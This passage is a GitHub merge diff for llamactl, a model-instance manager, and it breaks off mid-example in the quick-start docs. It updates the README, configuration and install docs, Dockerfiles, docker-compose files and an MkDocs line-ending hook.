Merge pull request #74 from lordmathis/refactor/health-check

refactor: Improve frontend health check
Fix ts type check
2025-11-07 17:44:22 +00:00 · 2025-10-26 19:54:38 +01:00 · 2025-10-26 19:52:44 +01:00 · 2025-10-26 19:48:07 +01:00 · 2025-10-26 19:12:35 +01:00 · 2025-10-26 19:05:03 +01:00
103 changed files with 11975 additions and 5670 deletions
--- a/.dockerignore
+++ b/.dockerignore
@@ -0,0 +1,45 @@
 # Git and version control
 .git/
 .gitignore
 # Documentation
 *.md
 docs/
 # Development files
 .vscode/
 .idea/
 # Build artifacts
 webui/node_modules/
 webui/dist/
 webui/.next/
 *.log
 *.tmp
 # Data directories
 data/
 models/
 logs/
 # Test files
 *_test.go
 **/*_test.go
 # CI/CD
 .github/
 # Local configuration
 llamactl.yaml
 config.yaml
 .env
 .env.local
 # OS files
 .DS_Store
 Thumbs.db
 # Backup files
 *.bak
 *.backup
 *~
--- a/.github/workflows/codeql.yaml
+++ b/.github/workflows/codeql.yaml
--- a/.github/workflows/docs.yaml
+++ b/.github/workflows/docs.yaml
@@ -1,4 +1,4 @@
-name: Build and Deploy Documentation
+name: User Docs
 on:
  push:
--- a/.gitignore
+++ b/.gitignore
@@ -34,4 +34,12 @@ go.work.sum
 node_modules/
 dist/
-__pycache__/
+__pycache__/
 site/
 # Dev config
 llamactl.dev.yaml
 # Debug files
 __debug*
--- a/.vscode/launch.json
+++ b/.vscode/launch.json
@@ -12,7 +12,7 @@
            "program": "${workspaceFolder}/cmd/server/main.go",
            "env": {
                "GO_ENV": "development",
-                "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
+                "LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
            },
        }
    ]
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -86,7 +86,7 @@ go install github.com/swaggo/swag/cmd/swag@latest
 # Update Swagger comments in pkg/server/handlers.go
 # Then regenerate docs
-swag init -g cmd/server/main.go -o apidocs
+swag init -g cmd/server/main.go
 ```
 ## Pull Request Guidelines
--- a/README.md
+++ b/README.md
@@ -1,104 +1,35 @@
 # llamactl
-![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
+![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![User Docs](https://github.com/lordmathis/llamactl/actions/workflows/docs.yaml/badge.svg)
 **Unified management and routing for llama.cpp, MLX and vLLM models with a web dashboard.**
-## Features
+📚 **[Full Documentation →](https://llamactl.org)**
 ### 🚀 Easy Model Management
 - **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
 - **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
 - **State Persistence**: Ensure instances remain intact across server restarts
 ### 🔗 Universal Compatibility
 - **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
 - **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
 ### 🌐 User-Friendly Interface
 - **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
 - **API Key Authentication**: Separate keys for management vs inference access
 ### ⚡ Smart Operations
 - **Instance Monitoring**: Health checks, auto-restart, log management
 - **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits  
 ![Dashboard Screenshot](docs/images/dashboard.png)
 ## Features
 **🚀 Easy Model Management**
 - **Multiple Models Simultaneously**: Run different models at the same time (7B for speed, 70B for quality)
 - **Smart Resource Management**: Automatic idle timeout, LRU eviction, and configurable instance limits
 - **Web Dashboard**: Modern React UI for managing instances, monitoring health, and viewing logs
 **🔗 Flexible Integration**
 - **OpenAI API Compatible**: Drop-in replacement - route requests to different models by instance name
 - **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
 - **Docker Ready**: Run backends in containers with full GPU support
 **🌐 Distributed Deployment**
 - **Remote Instances**: Deploy instances on remote hosts
 - **Central Management**: Manage everything from a single dashboard with automatic routing  
 ## Quick Start
-```bash
+1. Install a backend (llama.cpp, MLX, or vLLM) - see [Prerequisites](#prerequisites) below
-# 1. Install backend (one-time setup)
+2. [Download llamactl](#installation) for your platform
-# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
+3. Run `llamactl` and open http://localhost:8080
-# For MLX on macOS: pip install mlx-lm
+4. Create an instance and start inferencing!
 # For vLLM: pip install vllm
 # 2. Download and run llamactl
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # 3. Start the server
 llamactl
 # Access dashboard at http://localhost:8080
 ```
 ## Usage
 ### Create and manage instances via web dashboard:
 1. Open http://localhost:8080
 2. Click "Create Instance"
 3. Choose backend type (llama.cpp, MLX, or vLLM)
 4. Set model path and backend-specific options
 5. Start or stop the instance
 ### Or use the REST API:
 ```bash
 # Create llama.cpp instance
 curl -X POST localhost:8080/api/v1/instances/my-7b-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
 # Create MLX instance (macOS)
 curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
 # Create vLLM instance
 curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}}'
 # Use with OpenAI SDK
 curl -X POST localhost:8080/v1/chat/completions \
  -H "Authorization: Bearer your-key" \
  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
 ```
 ## Installation
 ### Option 1: Download Binary (Recommended)
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from the releases page:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Build from Source
 Requires Go 1.24+ and Node.js 22+
 ```bash
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 cd webui && npm ci && npm run build && cd ..
 go build -o llamactl ./cmd/server
 ```
 ## Prerequisites
@@ -112,6 +43,7 @@ You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp)
 brew install llama.cpp
 # Or build from source - see llama.cpp docs
 # Or use Docker - no local installation required
 ```
 **For MLX backend (macOS only):**
@@ -139,9 +71,76 @@ python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
-# For production deployments, consider container-based installation
+# Or use Docker - no local installation required
 ```
 ### Docker Support
 llamactl can run backends in Docker containers, eliminating the need for local backend installation:
 ```yaml
 backends:
  llama-cpp:
    docker:
      enabled: true
  vllm:
    docker:
      enabled: true
 ```
 ## Installation
 ### Option 1: Download Binary (Recommended)
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from the releases page:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Docker (No local backend installation required)
 ```bash
 # Clone repository and build Docker images
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 mkdir -p data/llamacpp data/vllm models
 # Build and start llamactl with llama.cpp CUDA backend
 docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
 # Build and start llamactl with vLLM CUDA backend
 docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
 # Build from source using multi-stage build
 docker build -f docker/Dockerfile.source -t llamactl:source .
 ```
 **Note:** Dockerfiles are configured for CUDA. Adapt base images for other platforms (CPU, ROCm, etc.).
 ### Option 3: Build from Source
 Requires Go 1.24+ and Node.js 22+
 ```bash
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 cd webui && npm ci && npm run build && cd ..
 go build -o llamactl ./cmd/server
 ```
 ## Usage
 1. Open http://localhost:8080
 2. Click "Create Instance"
 3. Choose backend type (llama.cpp, MLX, or vLLM)
 4. Configure your model and options (ports and API keys are auto-assigned)
 5. Start the instance and use it with any OpenAI-compatible client
 ## Configuration
 llamactl works out of the box with sensible defaults.
@@ -151,12 +150,34 @@ server:
  host: "0.0.0.0"                # Server host to bind to
  port: 8080                     # Server port to bind to
  allowed_origins: ["*"]         # Allowed CORS origins (default: all)
  allowed_headers: ["*"]         # Allowed CORS headers (default: all)
  enable_swagger: false          # Enable Swagger UI for API docs
 backends:
-  llama_executable: llama-server # Path to llama-server executable
+  llama-cpp:
-  mlx_lm_executable: mlx_lm.server # Path to mlx_lm.server executable
+    command: "llama-server"
-  vllm_executable: vllm # Path to vllm executable
+    args: []
    environment: {}               # Environment variables for the backend process
    docker:
      enabled: false
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "-v", "~/.local/share/llamactl/llama.cpp:/root/.cache/llama.cpp"]
      environment: {}             # Environment variables for the container
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}               # Environment variables for the backend process
    docker:
      enabled: false
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g", "-v", "~/.local/share/llamactl/huggingface:/root/.cache/huggingface"]
      environment: {}             # Environment variables for the container
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}               # Environment variables for the backend process
 instances:
  port_range: [8000, 9000]       # Port range for instances
--- a/cmd/server/main.go
+++ b/cmd/server/main.go
@@ -22,6 +22,9 @@ var buildTime string = "unknown"
 // @license.name MIT License
 // @license.url https://opensource.org/license/mit/
 // @basePath /api/v1
 // @securityDefinitions.apikey ApiKeyAuth
 // @in header
 // @name X-API-Key
 func main() {
 	// --version flag to print the version
@@ -58,7 +61,7 @@ func main() {
 	}
 	// Initialize the instance manager
-	instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
+	instanceManager := manager.New(&cfg)
 	// Create a new handler with the instance manager
 	handler := server.NewHandler(instanceManager, cfg)
--- a/docker/Dockerfile.llamacpp
+++ b/docker/Dockerfile.llamacpp
@@ -0,0 +1,23 @@
 FROM ghcr.io/ggml-org/llama.cpp:server-cuda
 # Install curl for downloading llamactl
 RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
 # Download and install the latest llamactl release
 RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl
 # Set working directory
 RUN mkdir -p /data
 WORKDIR /data
 # Expose the default llamactl port
 EXPOSE 8080
 ENV LLAMACTL_LLAMACPP_COMMAND=/app/llama-server
 ENV LD_LIBRARY_PATH="/app:/usr/local/lib:/usr/lib"
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/Dockerfile.source
+++ b/docker/Dockerfile.source
@@ -0,0 +1,64 @@
 # WebUI build stage (Node.js 22, matching the documented "Node.js 22+" build requirement)
 FROM node:22-alpine AS webui-builder
 WORKDIR /webui
 # Copy webui package files
 COPY webui/package*.json ./
 # Install dependencies
 RUN npm ci
 # Copy webui source
 COPY webui/ ./
 # Build webui
 RUN npm run build
 # Go build stage
 FROM golang:1.24-alpine AS builder
 # Install build dependencies
 RUN apk add --no-cache git ca-certificates
 # Set working directory
 WORKDIR /build
 # Copy go mod files
 COPY go.mod go.sum ./
 # Download dependencies
 RUN go mod download
 # Copy source code
 COPY cmd/ ./cmd/
 COPY pkg/ ./pkg/
 COPY docs/ ./docs/
 COPY webui/webui.go ./webui/
 # Copy built webui from webui-builder
 COPY --from=webui-builder /webui/dist ./webui/dist
 # Build the application
 RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags="-w -s" -o llamactl ./cmd/server
 # Final stage
 FROM alpine:latest
 # Install runtime dependencies
 RUN apk --no-cache add ca-certificates
 # Create data directory
 RUN mkdir -p /data
 # Set working directory
 WORKDIR /data
 # Copy binary from builder
 COPY --from=builder /build/llamactl /usr/local/bin/llamactl
 # Expose the default port
 EXPOSE 8080
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/Dockerfile.vllm
+++ b/docker/Dockerfile.vllm
@@ -0,0 +1,20 @@
 FROM vllm/vllm-openai:latest
 # Install curl for downloading llamactl
 RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
 # Download and install the latest llamactl release
 RUN LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/') && \
    curl -L "https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz" | tar -xz && \
    mv llamactl /usr/local/bin/ && \
    chmod +x /usr/local/bin/llamactl
 # Set working directory
 RUN mkdir -p /data
 WORKDIR /data
 # Expose the default llamactl port
 EXPOSE 8080
 # Set llamactl as the entrypoint
 ENTRYPOINT ["llamactl"]
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -0,0 +1,56 @@
 version: '3.8'
 services:
  llamactl-llamacpp:
    build:
      context: ..
      dockerfile: docker/Dockerfile.llamacpp
    image: llamactl:llamacpp-cuda
    container_name: llamactl-llamacpp
    ports:
      - "8080:8080"
    volumes:
      - ./data/llamacpp:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/llama.cpp:/root/.cache/llama.cpp  # Llama.cpp cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Enable Docker mode for nested containers (if needed)
      - LLAMACTL_LLAMACPP_DOCKER_ENABLED=false
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped
  llamactl-vllm:
    build:
      context: ..
      dockerfile: docker/Dockerfile.vllm
    image: llamactl:vllm-cuda
    container_name: llamactl-vllm
    ports:
      - "8081:8080"  # Use different port to avoid conflicts
    volumes:
      - ./data/vllm:/data
      - ./models:/models  # Mount models directory
      - ~/.cache/huggingface:/root/.cache/huggingface  # HuggingFace cache
    environment:
      # Set data directory for persistence
      - LLAMACTL_DATA_DIR=/data
      # Set to true to run backends in nested Docker containers (if needed)
      - LLAMACTL_VLLM_DOCKER_ENABLED=false
      # Expose all GPUs: "all" is an NVIDIA runtime value; CUDA_VISIBLE_DEVICES only accepts indices/UUIDs
      - NVIDIA_VISIBLE_DEVICES=all
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities: [gpu]
    restart: unless-stopped
--- a/docs-requirements.txt
+++ b/docs-requirements.txt
@@ -1,5 +1,6 @@
-mkdocs-material==9.5.3
+mkdocs-material==9.6.22
-mkdocs==1.5.3
+mkdocs==1.6.1
-pymdown-extensions==10.7
+pymdown-extensions==10.16.1
-mkdocs-git-revision-date-localized-plugin==1.2.4
+mkdocs-git-revision-date-localized-plugin==1.4.7
-mike==2.0.0
+mike==2.1.3
 neoteroi-mkdocs==1.1.3
--- a/docs/api-reference.md
+++ b/docs/api-reference.md
@@ -0,0 +1 @@
 [OAD(swagger.yaml)]
--- a/docs/getting-started/configuration.md
+++ b/docs/getting-started/configuration.md
@@ -17,12 +17,37 @@ server:
  host: "0.0.0.0"                # Server host to bind to
  port: 8080                     # Server port to bind to
  allowed_origins: ["*"]         # Allowed CORS origins (default: all)
  allowed_headers: ["*"]         # Allowed CORS headers (default: all)
  enable_swagger: false          # Enable Swagger UI for API docs
 backends:
-  llama_executable: llama-server # Path to llama-server executable
+  llama-cpp:
-  mlx_lm_executable: mlx_lm.server # Path to mlx_lm.server executable
+    command: "llama-server"
-  vllm_executable: vllm # Path to vllm executable
+    args: []
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}              # Environment variables for the backend process
    response_headers: {}         # Additional response headers to send with responses
 instances:
  port_range: [8000, 9000]       # Port range for instances
@@ -45,13 +70,17 @@ auth:
  inference_keys: []             # Keys for inference endpoints
  require_management_auth: true  # Require auth for management endpoints
  management_keys: []            # Keys for management endpoints
 local_node: "main"               # Name of the local node (default: "main")
 nodes:                           # Node configuration for multi-node deployment
  main:                          # Default local node (empty config)
 ```
 ## Configuration Files
 ### Configuration File Locations
-Configuration files are searched in the following locations (in order of precedence):
+Configuration files are searched in the following locations (in order of precedence, first found is used):
 **Linux:**  
 - `./llamactl.yaml` or `./config.yaml` (current directory)  
@@ -80,6 +109,7 @@ server:
  host: "0.0.0.0"         # Server host to bind to (default: "0.0.0.0")
  port: 8080              # Server port to bind to (default: 8080)
  allowed_origins: ["*"]  # CORS allowed origins (default: ["*"])
  allowed_headers: ["*"]  # CORS allowed headers (default: ["*"])
  enable_swagger: false   # Enable Swagger UI (default: false)
 ```
@@ -90,18 +120,78 @@ server:
 - `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
 ### Backend Configuration
 ```yaml
 backends:
-  llama_executable: "llama-server"     # Path to llama-server executable (default: "llama-server")
+  llama-cpp:
-  mlx_lm_executable: "mlx_lm.server"   # Path to mlx_lm.server executable (default: "mlx_lm.server")
+    command: "llama-server"
-  vllm_executable: "vllm"              # Path to vllm executable (default: "vllm")
+    args: []
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false             # Enable Docker runtime (default: false)
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {}              # Environment variables for the backend process
    docker:
      enabled: false             # Enable Docker runtime (default: false)
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
      environment: {}
    response_headers: {}         # Additional response headers to send with responses
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {}              # Environment variables for the backend process
    # MLX does not support Docker
    response_headers: {}         # Additional response headers to send with responses
 ```
 **Backend Configuration Fields:**
 - `command`: Executable name/path for the backend
 - `args`: Default arguments prepended to all instances
 - `environment`: Environment variables for the backend process (optional)
 - `response_headers`: Additional response headers to send with responses (optional)
 - `docker`: Docker-specific configuration (optional)
  - `enabled`: Boolean flag to enable Docker runtime
  - `image`: Docker image to use
  - `args`: Additional arguments passed to `docker run`
  - `environment`: Environment variables for the container (optional)
 > If llamactl is behind an NGINX proxy, the `X-Accel-Buffering: no` response header may be required for NGINX to stream responses properly without buffering them.
 **Environment Variables:**
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
+
- `LLAMACTL_MLX_LM_EXECUTABLE` - Path to mlx_lm.server executable
+**LlamaCpp Backend:**
- `LLAMACTL_VLLM_EXECUTABLE` - Path to vllm executable
+- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
 - `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
 - `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
 - `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
 - `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
 - `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_LLAMACPP_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 **VLLM Backend:**
 - `LLAMACTL_VLLM_COMMAND` - VLLM executable command
 - `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
 - `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
 - `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
 - `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
 - `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_VLLM_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 **MLX Backend:**
 - `LLAMACTL_MLX_COMMAND` - MLX executable command
 - `LLAMACTL_MLX_ARGS` - Space-separated default arguments
 - `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
 - `LLAMACTL_MLX_RESPONSE_HEADERS` - Response headers in format "KEY1=value1;KEY2=value2"
 ### Instance Configuration
@@ -149,18 +239,32 @@ auth:
  management_keys: []                    # List of valid management API keys
 ```
-**Environment Variables:**  
+**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)  
+- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys  
+- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)  
+- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys  
+- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
-## Command Line Options
+### Remote Node Configuration
-View all available command line options:
+llamactl supports remote node deployments. Configure remote nodes to deploy instances on remote hosts and manage them centrally.
-```bash
+```yaml
-llamactl --help
+local_node: "main"               # Name of the local node (default: "main")
 nodes:                           # Node configuration map
  main:                          # Local node (empty address means local)
    address: ""                  # Not used for local node
    api_key: ""                  # Not used for local node
  worker1:                       # Remote worker node
    address: "http://192.168.1.10:8080"
    api_key: "worker1-api-key"   # Management API key for authentication
 ```
-You can also override configuration using command line flags when starting llamactl.
+**Node Configuration Fields:**
 - `local_node`: Name of the entry in the `nodes` map that represents the local node. It must exactly match the name that other nodes use to refer to this node.
 - `nodes`: Map of node configurations
  - `address`: HTTP/HTTPS URL of the remote node (empty for local node)
  - `api_key`: Management API key for authenticating with the remote node
 **Environment Variables:**
 - `LLAMACTL_LOCAL_NODE` - Name of the local node
--- a/docs/css/css-v1.1.3.css
+++ b/docs/css/css-v1.1.3.css
--- a/apidocs/docs.go
+++ b/apidocs/docs.go
--- a/docs/fix_line_endings.py
+++ b/docs/fix_line_endings.py
@@ -0,0 +1,60 @@
 """
 MkDocs hook to fix line endings for proper rendering.
 Automatically adds two spaces at the end of lines that need line breaks.
 """
 import re
 def on_page_markdown(markdown, page, config, **kwargs):
    """
    MkDocs page hook that forces hard line breaks in page text.
    Appends two trailing spaces (a Markdown hard line break) to every line
    of ``markdown`` except fenced-code content, blank lines, and lines that
    look structural (headers, blockquotes, table rows, ``---`` lines, HTML
    tags, standalone punctuation) or that already end with two spaces.
    Args:
        markdown: Raw page Markdown as a single string.
        page: Unused; accepted to match the hook signature.
        config: Unused; accepted to match the hook signature.
        **kwargs: Unused; any extra keyword arguments are ignored.
    Returns:
        The processed Markdown, with lines re-joined by newline characters.
    """
    # Lines consisting solely of one of these tokens are left untouched.
    standalone_tokens = ('.', '!', '?', ':', ';', '```', '---', ',')
    processed_lines = []
    in_code_block = False
    for line in markdown.split('\n'):
        stripped = line.strip()
        # A ``` fence toggles code-block state; the fence line itself is kept as-is.
        if stripped.startswith('```'):
            in_code_block = not in_code_block
            processed_lines.append(line)
            continue
        # Nothing is rewritten inside code blocks or on blank lines.
        if in_code_block or not stripped:
            processed_lines.append(line)
            continue
        # Skip lines that shouldn't have line breaks:
        # - Headers (# ## ###)
        # - Blockquotes (>)
        # - Table rows (any line containing |)
        # - Lines already ending with two spaces
        # - YAML front matter delimiters and HTML tags
        # - Standalone punctuation lines
        if (stripped.startswith(('#', '>', '---', '<')) or
            '|' in stripped or
            line.endswith('  ') or
            stripped.endswith('>') or
            stripped in standalone_tokens):
            processed_lines.append(line)
            continue
        # Everything that reaches this point is non-empty text outside a code
        # block, so it always receives the hard-break suffix.
        processed_lines.append(line.rstrip() + '  ')
    return '\n'.join(processed_lines)
--- a/docs/getting-started/installation.md
+++ b/docs/getting-started/installation.md
@@ -1,105 +0,0 @@
 # Installation
 This guide will walk you through installing Llamactl on your system.
 ## Prerequisites
 ### Backend Dependencies
 llamactl supports multiple backends. Install at least one:
 **For llama.cpp backend (all platforms):**
 You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
 ```bash
 # Homebrew (macOS/Linux)
 brew install llama.cpp
 # Winget (Windows)
 winget install llama.cpp
 ```
 Or build from source - see llama.cpp docs
 **For MLX backend (macOS only):**
 MLX provides optimized inference on Apple Silicon. Install MLX-LM:
 ```bash
 # Install via pip (requires Python 3.8+)
 pip install mlx-lm
 # Or in a virtual environment (recommended)
 python -m venv mlx-env
 source mlx-env/bin/activate
 pip install mlx-lm
 ```
 Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
 **For vLLM backend:**
 vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
 ```bash
 # Install via pip (requires Python 3.8+, GPU required)
 pip install vllm
 # Or in a virtual environment (recommended)
 python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
 # For production deployments, consider container-based installation
 ```
 ## Installation Methods
 ### Option 1: Download Binary (Recommended)
 Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Build from Source
 Requirements:
 - Go 1.24 or later
 - Node.js 22 or later
 - Git
 If you prefer to build from source:
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Build the web UI
 cd webui && npm ci && npm run build && cd ..
 # Build the application
 go build -o llamactl ./cmd/server
 ```
 ## Verification
 Verify your installation by checking the version:
 ```bash
 llamactl --version
 ```
 ## Next Steps
 Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
--- a/docs/getting-started/quick-start.md
+++ b/docs/getting-started/quick-start.md
@@ -1,175 +0,0 @@
 # Quick Start
 This guide will help you get Llamactl up and running in just a few minutes.
 ## Step 1: Start Llamactl
 Start the Llamactl server:
 ```bash
 llamactl
 ```
 By default, Llamactl will start on `http://localhost:8080`.
 ## Step 2: Access the Web UI
 Open your web browser and navigate to:
 ```
 http://localhost:8080
 ```
 Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
 You should see the Llamactl web interface.
 ## Step 3: Create Your First Instance
 1. Click the "Add Instance" button
 2. Fill in the instance configuration:
   - **Name**: Give your instance a descriptive name
   - **Backend Type**: Choose from llama.cpp, MLX, or vLLM
   - **Model**: Model path or identifier for your chosen backend
   - **Additional Options**: Backend-specific parameters
 3. Click "Create Instance"
 ## Step 4: Start Your Instance
 Once created, you can:
 - **Start** the instance by clicking the start button
 - **Monitor** its status in real-time
 - **View logs** by clicking the logs button
 - **Stop** the instance when needed
 ## Example Configurations
 Here are basic example configurations for each backend:
 **llama.cpp backend:**
 ```json
 {
  "name": "llama2-7b",
  "backend_type": "llama_cpp",
  "backend_options": {
